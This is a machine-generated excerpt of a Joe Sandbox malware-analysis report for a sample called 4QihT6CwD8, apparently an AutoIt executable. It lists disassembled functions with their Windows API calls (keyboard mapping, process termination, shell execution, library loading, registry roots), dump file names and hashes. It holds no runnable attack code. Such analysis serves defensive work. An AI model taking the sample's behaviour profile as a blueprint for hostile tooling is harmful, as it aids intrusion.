                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 003B5229
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003B5230
                                  • ReleaseDC.USER32(00000000,00000000), ref: 003B5238
                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 003B524F
                                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 003B5261
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CapsDevice$Release
                                  • String ID:
                                  • API String ID: 1035833867-0
                                  • Opcode ID: 92b5f51fb0fc37e54be5009fe40aab1e810dbf1018494784746f649e16b2ad3e
                                  • Instruction ID: 8d2cf434566cf7f3704af4dd7cec13b92384a34200fd837f31a703d797518071
                                  • Opcode Fuzzy Hash: 92b5f51fb0fc37e54be5009fe40aab1e810dbf1018494784746f649e16b2ad3e
                                  • Instruction Fuzzy Hash: E6018F75A01708BBEB119BE59C89B8EBFB8EB48751F044165FB04AB280D6709C01CBA0
                                  Function 00351BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00351BF4
                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00351BFC
                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00351C07
                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00351C12
                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00351C1A
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00351C22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Virtual
                                  • String ID:
                                  • API String ID: 4278518827-0
                                  • Opcode ID: 84a7af50c089b9985d5762f8b104e831e5e0fbeab3cd0aa5340b57deb8a13b37
                                  • Instruction ID: 722ddc97c3563fc3fbdac0539f870d56eef3990d9c1a2d4ad6d8284adea4b806
                                  • Opcode Fuzzy Hash: 84a7af50c089b9985d5762f8b104e831e5e0fbeab3cd0aa5340b57deb8a13b37
                                  • Instruction Fuzzy Hash: A70148B09027597DE3008F5A8C85A56FFA8FF19354F04411B915C4BA41C7B5A864CBE5
                                  Function 003BEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003BEB30
                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003BEB46
                                  • GetWindowThreadProcessId.USER32(?,?), ref: 003BEB55
                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003BEB64
                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003BEB6E
                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003BEB75
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                  • String ID:
                                  • API String ID: 839392675-0
                                  • Opcode ID: 8b6a456ca903f3a62598a4192052dcb82ce6c850fb37fe8fd1f82bc6bb65b2dd
                                  • Instruction ID: e179db479c8954da3e4b70a390fa91a684536d7c0545562153ef9e848554ad18
                                  • Opcode Fuzzy Hash: 8b6a456ca903f3a62598a4192052dcb82ce6c850fb37fe8fd1f82bc6bb65b2dd
                                  • Instruction Fuzzy Hash: CAF03A72250198BBE7325B629C4EEEF7A7CEFCAB11F001258FA01D91D1D7A05A02C6B5
                                  Function 003A7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetClientRect.USER32(?), ref: 003A7452
                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 003A7469
                                  • GetWindowDC.USER32(?), ref: 003A7475
                                  • GetPixel.GDI32(00000000,?,?), ref: 003A7484
                                  • ReleaseDC.USER32(?,00000000), ref: 003A7496
                                  • GetSysColor.USER32(00000005), ref: 003A74B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                  • String ID:
                                  • API String ID: 272304278-0
                                  • Opcode ID: 11e49175cd1ada09a7bf6bcdff4dcd8458eba0d7342f4ff3257e6196ebac8105
                                  • Instruction ID: f945b494515ea05cea8fed0cd14c4e5b16577e7aa7c096d724f6c0a0cac1ba29
                                  • Opcode Fuzzy Hash: 11e49175cd1ada09a7bf6bcdff4dcd8458eba0d7342f4ff3257e6196ebac8105
                                  • Instruction Fuzzy Hash: 1601DB31010244EFEB225F64DC88BEE7BB9FB08311F150260F926A60E0CB301E02EB10
                                  Function 003B1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003B187F
                                  • UnloadUserProfile.USERENV(?,?), ref: 003B188B
                                  • CloseHandle.KERNEL32(?), ref: 003B1894
                                  • CloseHandle.KERNEL32(?), ref: 003B189C
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 003B18A5
                                  • HeapFree.KERNEL32(00000000), ref: 003B18AC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                  • String ID:
                                  • API String ID: 146765662-0
                                  • Opcode ID: 17b68c0a4908697e47395fdd42c74d008ad4304826e23a429efb4880a4658f2b
                                  • Instruction ID: 6396587b06eb731049d6eb7cb2dbc8dc7861fba832cf516298809746338deafd
                                  • Opcode Fuzzy Hash: 17b68c0a4908697e47395fdd42c74d008ad4304826e23a429efb4880a4658f2b
                                  • Instruction Fuzzy Hash: ABE0C236014249BBDB125BA1ED4C90ABB2DFB4AB22B109320F625890B0CB329422DB50
                                  Function 0035BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                                  Download Yara Rule
                                  APIs
                                  • __Init_thread_footer.LIBCMT ref: 0035BEB3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Init_thread_footer
                                  • String ID: D%B$D%B$D%B$D%BD%B
                                  • API String ID: 1385522511-523730649
                                  • Opcode ID: ddaa29c25dca978838e29ca5c8c9fb1f2cd2207aa63a5864c170f1db52308d94
                                  • Instruction ID: ae96facabe1facfcdc8e8cc8bd3dc79723d6baf95819b10104dd25932d997210
                                  • Opcode Fuzzy Hash: ddaa29c25dca978838e29ca5c8c9fb1f2cd2207aa63a5864c170f1db52308d94
                                  • Instruction Fuzzy Hash: 67918875A0020ADFCB19CF58C091AAAF7F5FF58311F25816AE941AB360E731ED85CB94
                                  Function 003D7B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00370242: EnterCriticalSection.KERNEL32(0042070C,00421884,?,?,0036198B,00422518,?,?,?,003512F9,00000000), ref: 0037024D
                                    • Part of subcall function 00370242: LeaveCriticalSection.KERNEL32(0042070C,?,0036198B,00422518,?,?,?,003512F9,00000000), ref: 0037028A
                                    • Part of subcall function 00359CB3: _wcslen.LIBCMT ref: 00359CBD
                                    • Part of subcall function 003700A3: __onexit.LIBCMT ref: 003700A9
                                  • __Init_thread_footer.LIBCMT ref: 003D7BFB
                                    • Part of subcall function 003701F8: EnterCriticalSection.KERNEL32(0042070C,?,?,00368747,00422514), ref: 00370202
                                    • Part of subcall function 003701F8: LeaveCriticalSection.KERNEL32(0042070C,?,00368747,00422514), ref: 00370235
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                  • String ID: +T:$5$G$Variable must be of type 'Object'.
                                  • API String ID: 535116098-4140445994
                                  • Opcode ID: 1c53ac406108b0b9301c4637bc27baf4f79fd3863ce8afd63d269f539270ddbb
                                  • Instruction ID: d7d83d69bd0460dfec804a4a91cf14c5ce223db93a4cbaa925a4c46fd2791227
                                  • Opcode Fuzzy Hash: 1c53ac406108b0b9301c4637bc27baf4f79fd3863ce8afd63d269f539270ddbb
                                  • Instruction Fuzzy Hash: 2891BF75A04208EFCB16EF54E891DADB7B6FF45300F50805AF806AB392EB71AE45CB51
                                  Function 003BC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00357620: _wcslen.LIBCMT ref: 00357625
                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003BC6EE
                                  • _wcslen.LIBCMT ref: 003BC735
                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003BC79C
                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003BC7CA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ItemMenu$Info_wcslen$Default
                                  • String ID: 0
                                  • API String ID: 1227352736-4108050209
                                  • Opcode ID: d4632ff7e563043ca2fe7edfb6b3b0abc949d10ebc707e8441c3fb0dedae07b6
                                  • Instruction ID: 98f4ea8a3442492bb0a779d7140816189b18f0a3343c85d5a92218b338180f86
                                  • Opcode Fuzzy Hash: d4632ff7e563043ca2fe7edfb6b3b0abc949d10ebc707e8441c3fb0dedae07b6
                                  • Instruction Fuzzy Hash: B351F4716243009FD7329F28C896BEB77E8AF49318F042629FA95D79E0DB64D904CB52
                                  Function 003DAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                  Download Yara Rule
                                  APIs
                                  • ShellExecuteExW.SHELL32(0000003C), ref: 003DAEA3
                                    • Part of subcall function 00357620: _wcslen.LIBCMT ref: 00357625
                                  • GetProcessId.KERNEL32(00000000), ref: 003DAF38
                                  • CloseHandle.KERNEL32(00000000), ref: 003DAF67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CloseExecuteHandleProcessShell_wcslen
                                  • String ID: <$@
                                  • API String ID: 146682121-1426351568
                                  • Opcode ID: 8ea65e9fbdb5ec47430265fc35e60cdb2506e796747da9ae55b2098474f41ecf
                                  • Instruction ID: aaafcf806fa8301d8edfc425ca603d5825212aa1387852108e05e10bc4c6d036
                                  • Opcode Fuzzy Hash: 8ea65e9fbdb5ec47430265fc35e60cdb2506e796747da9ae55b2098474f41ecf
                                  • Instruction Fuzzy Hash: D2717872A00618DFCB16DF54D584A9EBBF4BF08304F04889AE856AF3A2C734ED45CB91
                                  Function 003B719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003B7206
                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003B723C
                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003B724D
                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003B72CF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                  • String ID: DllGetClassObject
                                  • API String ID: 753597075-1075368562
                                  • Opcode ID: 0cacf6eea054cfddf64dd7442605ec94f9be2f58114c995292c94ded90494680
                                  • Instruction ID: 5b953e2a38413f604168427d634ee9be7999aed72aafce5edeff8e3a66388bd2
                                  • Opcode Fuzzy Hash: 0cacf6eea054cfddf64dd7442605ec94f9be2f58114c995292c94ded90494680
                                  • Instruction Fuzzy Hash: 04419171A04204EFDB16CF54C884ADA7BA9EF84318F1584ADFE059F64AD7B1DA41CBA0
                                  Function 003DC9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _wcslen
                                  • String ID: HKEY_LOCAL_MACHINE$HKLM
                                  • API String ID: 176396367-4004644295
                                  • Opcode ID: 366c2935ead4d296047bd430929a325d59b567039225cfa016582c172ffd3791
                                  • Instruction ID: 133df6c3dbff107fdff6cd2d56b6ff7781eb7bbcbca4694eff29ec7b436ab5c7
                                  • Opcode Fuzzy Hash: 366c2935ead4d296047bd430929a325d59b567039225cfa016582c172ffd3791
                                  • Instruction Fuzzy Hash: 6031D573A3016B8BCB22DE6CA9505BE33A15BA1750B16502BFC45AB355EB71CE84D3A0
                                  Function 003E2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003E2F8D
                                  • LoadLibraryW.KERNEL32(?), ref: 003E2F94
                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003E2FA9
                                  • DestroyWindow.USER32(?), ref: 003E2FB1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend$DestroyLibraryLoadWindow
                                  • String ID: SysAnimate32
                                  • API String ID: 3529120543-1011021900
                                  • Opcode ID: a6b90fdc30f0ad6e643c15c3a6bc1d7b3d7ee6b7269b98d16417d5f05ccb23e2
                                  • Instruction ID: ffe4023c61eba41edefc2ef17fcaa44b5f15ade83bf748802cc6729df6f61ebc
                                  • Opcode Fuzzy Hash: a6b90fdc30f0ad6e643c15c3a6bc1d7b3d7ee6b7269b98d16417d5f05ccb23e2
                                  • Instruction Fuzzy Hash: F021CD72204295ABEB224F65DC81FBB77BDEB58324F110328F910D61E0D771DC529760
                                  Function 00374D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00374D1E,003828E9,?,00374CBE,003828E9,004188B8,0000000C,00374E15,003828E9,00000002), ref: 00374D8D
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00374DA0
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00374D1E,003828E9,?,00374CBE,003828E9,004188B8,0000000C,00374E15,003828E9,00000002,00000000), ref: 00374DC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 2df7cffd7d131b2c977d3d0d1b2e66b3ae0bb666684307638bf6fec6a914b69e
                                  • Instruction ID: 30ce17d5ba56013269fa2ea3cd9dd56d14338462ccf054af0da4f58fab641400
                                  • Opcode Fuzzy Hash: 2df7cffd7d131b2c977d3d0d1b2e66b3ae0bb666684307638bf6fec6a914b69e
                                  • Instruction Fuzzy Hash: 20F0A434550208BBDB375F94DC89BEDBFB9EF04711F0141A4F909A6291CB346941CA90
                                  Function 00354E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00354EDD,?,00421418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00354E9C
                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00354EAE
